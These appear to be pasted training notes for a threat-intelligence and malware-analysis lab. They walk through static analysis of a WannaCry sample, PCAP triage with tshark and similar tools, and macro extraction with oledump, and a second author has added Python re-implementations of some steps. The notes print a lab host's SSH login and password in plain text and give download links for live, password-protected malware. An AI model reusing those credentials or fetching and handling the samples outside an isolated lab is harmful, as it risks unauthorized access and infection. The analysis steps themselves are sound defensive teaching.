joemccray

Threat Intel

Nov 22nd, 2019
###################################
# Fusion Cell/Threat Intelligence #
###################################



Mission/Target
--------------
- External (a company hired to do threat intel for you)
- Generic keyword searches for terms that are relevant to your organization

- Internal
- Analyze indicators and artifacts, and distribute relevant info to the appropriate business units
- Analyze potential threat actors that may target your organization



Technical Components
--------------------

Data to analyze:
- Feeds (who do you want to listen to?)
https://github.com/P3t3rp4rk3r/Threat_Intelligence#sources

- Formats (what language do you want to speak?)
https://github.com/P3t3rp4rk3r/Threat_Intelligence#formats

- Platforms
- How do we talk to each other and to other people (email, phone, postcard)

Open source platforms
https://github.com/OpenCTI-Platform/opencti

- Secure Linux OS (Qubes/Tails)
https://www.fossmint.com/best-linux-distros-for-privacy-security/

- Non-attributable network
Purchase a separate business internet connection



Sample Reports
--------------
- Reports
https://github.com/fdiskyou/threat-INTel


APT Research
------------
https://github.com/aptnotes/data
https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections
https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/pubhtml#


Threat Analysts Online tools/dashboards
---------------------------------------
https://start.me/p/rxRbpo/ti



---------------------------------------------------------------------------------------------

- I prefer to use PuTTY to SSH into my Linux host.
- You can download PuTTY from here:
- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

Here is the information to put into PuTTY:

Host Name: 149.28.201.171
protocol: ssh
port: 22
username: cti
password: I-love-CTI-123!

mkdir ~/yourname

cd ~/yourname

wget http://45.63.104.73/wannacry.zip

unzip wannacry.zip
**** password is infected ****

file wannacry.exe

objdump -x wannacry.exe

strings wannacry.exe

strings wannacry.exe | grep -i dll

strings wannacry.exe | grep -i library

strings wannacry.exe | grep -i reg

strings wannacry.exe | grep -i key

strings wannacry.exe | grep -i rsa

strings wannacry.exe | grep -i open

strings wannacry.exe | grep -i get

strings wannacry.exe | grep -i mutex

strings wannacry.exe | grep -i irc

strings wannacry.exe | grep -i join

strings wannacry.exe | grep -i admin

strings wannacry.exe | grep -i list
-----------------------------------------------------------------------
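Added example (mine, not from these notes): the keyword triage that the strings | grep passes above perform, written in Python over a constructed byte blob so it runs without the WannaCry sample. The strings(1)-style extraction, the blob contents and the keyword list are my assumptions, not the sample's real strings.

```python
import re
from collections import defaultdict

# Keyword buckets mirroring the grep -i passes above.
KEYWORDS = ["dll", "library", "reg", "key", "rsa", "open", "get",
            "mutex", "irc", "join", "admin", "list"]

# Constructed stand-in for a PE file: binary junk around a few printable runs
# of the kind strings(1) surfaces. Not taken from any real sample.
SAMPLE_BLOB = (b"MZ\x90\x00\x03\x00" + b"\xff" * 9 + b"KERNEL32.dll\x00"
               + b"\x01\x02CreateMutexA\x00" + b"\x00" * 5
               + b"ADVAPI32.dll\x00RegOpenKeyExA\x00"
               + b"ab\x00"                      # too short, strings(1) skips it
               + b"CryptGenKey\x00\x7f\x80GetProcAddress\x00")

def extract_strings(data, min_len=4):
    """Printable-ASCII runs of at least min_len bytes, what strings(1) prints by default."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]

def keyword_hits(strings, keywords=KEYWORDS):
    """Bucket strings by each case-insensitive keyword they contain (one string can hit several)."""
    hits = defaultdict(list)
    for s in strings:
        low = s.lower()
        for kw in keywords:
            if kw in low:
                hits[kw].append(s)
    return dict(hits)

if __name__ == "__main__":
    for kw, matches in sorted(keyword_hits(extract_strings(SAMPLE_BLOB)).items()):
        print(f"{kw:8s} {matches}")
```

Run it against a real file by replacing SAMPLE_BLOB with open(path, "rb").read(); the imports and registry/key/mutex hits land in the same buckets the grep passes produce.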


Reference:
https://www.mcafee.com/blogs/other-blogs/executive-perspectives/analysis-wannacry-ransomware-outbreak/


1. Read the advisory
2. Check threat intel sites
- https://www.threatminer.org/
3. Upload to a sandbox (VirusTotal)
4. Upload to a dynamic sandbox (https://hybrid-analysis.com/)
5. Upload the PCAP to an analysis platform (https://packettotal.com/)



##############################
# Threat Hunting on the wire #
##############################



###############################
# Analyzing a PCAP with Prads #
# Note: run as regular user   #
###############################

---------------------------Type this as a regular user----------------------------------
cd ~/yourname

mkdir pcap_analysis/

cd ~/yourname/pcap_analysis/

mkdir prads

cd ~/yourname/pcap_analysis/prads

wget http://45.63.104.73/suspicious-time.pcap

prads -r suspicious-time.pcap -l prads-asset.log

cat prads-asset.log | less

cat prads-asset.log | grep SYN | grep -iE 'windows|linux'

cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'

cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'
-----------------------------------------------------------------------



##################################
# PCAP Analysis with ChaosReader #
# Note: run as regular user      #
##################################
---------------------------Type this as a regular user----------------------------------
cd ~/yourname

mkdir -p pcap_analysis/chaos_reader/

cd ~/yourname/pcap_analysis/chaos_reader/

wget http://45.63.104.73/suspicious-time.pcap

wget http://45.63.104.73/chaosreader.pl

perl chaosreader.pl suspicious-time.pcap

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr

for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u

for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u | awk '{print $5}' > url.lst

wget https://raw.githubusercontent.com/Open-Sec/forensics-scripts/master/check-urls-virustotal.py

python check-urls-virustotal.py url.lst
------------------------------------------------------------------------



#############################
# PCAP Analysis with tshark #
# Note: run as regular user #
#############################
---------------------------Type this as a regular user---------------------------------
cd ~/yourname/pcap_analysis/

mkdir tshark

cd ~/yourname/pcap_analysis/tshark

wget http://45.63.104.73/suspicious-time.pcap

tshark -r suspicious-time.pcap -qz io,phs

tshark -r suspicious-time.pcap -qz ip_hosts,tree

tshark -r suspicious-time.pcap -Y "http.request" -T fields -e "ip.src" -e "http.user_agent" | uniq

tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"

tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'

whois rapidshare.com.eyu32.ru

whois sploitme.com.cn

tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'

tshark -r suspicious-time.pcap -qz http_req,tree

tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst

tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
------------------------------------------------------------------------
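Added example (mine, not from these notes): the tshark request listing, the grep -v noise filter, the 10.0.3.15 client filter and the sed query trimming above, together with the sort | uniq -c | sort -nr tally from the ChaosReader section, applied in Python to a constructed tab-separated tshark field dump. The host names, addresses and paths are made up; none of them come from the lab PCAP.

```python
import re
from collections import Counter

# Constructed stand-in for the tshark field dump above (ip.src, ip.dst,
# http.host, http.request.uri, tab-separated). Hosts and paths are made up.
SAMPLE_TSHARK = """\
10.0.3.15\t203.0.113.5\texample.test\t/index.php
10.0.3.15\t203.0.113.5\texample.test\t/images/logo.png
10.0.3.15\t203.0.113.5\texample.test\t/style.css
10.0.3.15\t198.51.100.9\tcdn.example.test\t/load.php?e=1&id=42
10.0.3.15\t198.51.100.9\tcdn.example.test\t/stats.php?uid=99&ref=home
10.0.2.7\t203.0.113.5\tgoogle.example\t/search?q=x
10.0.3.15\t203.0.113.5\texample.test\t/favicon.ico
"""

# The same patterns the grep -v chain above drops as noise.
NOISE = ("/image", ".css", ".ico", "google", "honeynet.org")

def parse_requests(text):
    """Field lines -> (src, dst, url), like the awk one-liner that builds http://host+uri."""
    rows = []
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) != 4:
            continue                      # blank or malformed line
        src, dst, host, uri = parts
        rows.append((src, dst, "http://" + host + uri))
    return rows

def is_noise(url):
    return any(n in url for n in NOISE)

def trim_query(url):
    """The sed trick above: keep ?c= / ?s= / ?e= queries, elide any other query string."""
    return re.sub(r"\?[^cse].*", "?...", url)

def interesting_requests(text, victim=""):
    """Noise-free request lines, optionally limited to one client IP (the grep 10.0.3.15 step)."""
    out = []
    for src, dst, url in parse_requests(text):
        if is_noise(url) or (victim and src != victim):
            continue
        out.append(f"{src} -> {dst} : {trim_query(url)}")
    return out

def dst_counts(text):
    """Requests per server (the sort | uniq -c | sort -nr tally), noise excluded."""
    return Counter(dst for _, dst, url in parse_requests(text) if not is_noise(url))
```

Feed it real output by piping the tshark -T fields command into a file and passing its contents as text; the busiest non-noise destination in dst_counts is the first server to look up with whois.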


###############################
# Extracting files from PCAPs #
# Note: run as regular user   #
###############################
---------------------------Type this as a regular user---------------------------------
cd ~/yourname/pcap_analysis/

mkdir extract_files

cd extract_files

wget http://45.63.104.73/suspicious-time.pcap

foremost -v -i suspicious-time.pcap

cd output

ls

cat audit.txt

cd exe

wget https://raw.githubusercontent.com/GREEKYnikhilsharma/Xen0ph0n-VirusTotal_API_Tool-Python3/master/vtlite.py

******* NOTE: You will need to put your VirusTotal API key in vtlite.py *******

for f in *.exe; do python3 vtlite.py -s "$f"; done
---------------------------------------------------------------------------------------



##############################################
# Introduction to more sophisticated malware #
##############################################


---------------------------Type This-----------------------------------
cd ~/yourname

mkdir vba_malware

cd vba_malware

wget https://infosecaddicts-files.s3.amazonaws.com/064016.zip

wget http://didierstevens.com/files/software/oledump_V0_0_22.zip

unzip oledump_V0_0_22.zip

unzip 064016.zip
**** password is infected ****

python oledump.py 064016.doc

python oledump.py 064016.doc -s A4 -v
-----------------------------------------------------------------------


- From this we can see that this Word doc contains an embedded file called editdata.mso, which contains seven data streams.
- Three of the data streams are flagged as macros: A3:'VBA/Module1', A4:'VBA/Module2', A5:'VBA/ThisDocument'.

---------------------------Type This-----------------------------------
python oledump.py 064016.doc -s A5 -v
-----------------------------------------------------------------------

- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.

---------------------------Type This-----------------------------------
python oledump.py 064016.doc -s A3 -v
-----------------------------------------------------------------------


- Look for "GVhkjbjv" and you should see:


- Take that long blob that starts with 636D and finishes with 653B and paste it in:
http://www.rapidtables.com/convert/number/hex-to-ascii.htm
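Added example (mine, not from these notes): the hex-to-ASCII step above done locally instead of on a web page, pulling hex string literals out of a constructed VBA fragment written in the style of the A3 stream. The fragment, the function name reuse and the decoded text are my constructions, not the real macro's contents.

```python
import re

# Constructed VBA fragment: a long hex string literal of the kind the A3 stream
# stores, which a helper decodes at run time. The decoded text here is a
# harmless echo, chosen so it starts with 636D and ends with 653B like the page says.
SAMPLE_VBA = '''
Function GVhkjbjv()
    Dim zq As String
    zq = "636D64202F63206563686F2073616D706C653B"
    GVhkjbjv = zq
End Function
'''

# A quoted literal made only of hex pairs, at least 8 bytes long (shorter ones are noise).
HEX_LITERAL = re.compile(r'"((?:[0-9A-Fa-f]{2}){8,})"')

def hex_to_ascii(blob):
    """Same conversion as the hex-to-ascii web page, kept offline so the sample never leaves the box."""
    return bytes.fromhex(blob).decode("ascii", errors="replace")

def decode_hex_literals(vba_src):
    """Return (hex, decoded) pairs for every hex string literal in the VBA source."""
    return [(m.group(1), hex_to_ascii(m.group(1))) for m in HEX_LITERAL.finditer(vba_src)]

# Triage terms to flag in decoded text; my list, extend it for your own cases.
SUSPICIOUS = ("cmd", "powershell", "wscript", "http")

def flag(decoded):
    low = decoded.lower()
    return [t for t in SUSPICIOUS if t in low]

if __name__ == "__main__":
    for hexblob, text in decode_hex_literals(SAMPLE_VBA):
        print(f"{hexblob[:8]}...{hexblob[-4:]} -> {text!r}  flags={flag(text)}")
```

Paste the real A3 stream text (the oledump -s A3 -v output) in place of SAMPLE_VBA to decode the actual blob.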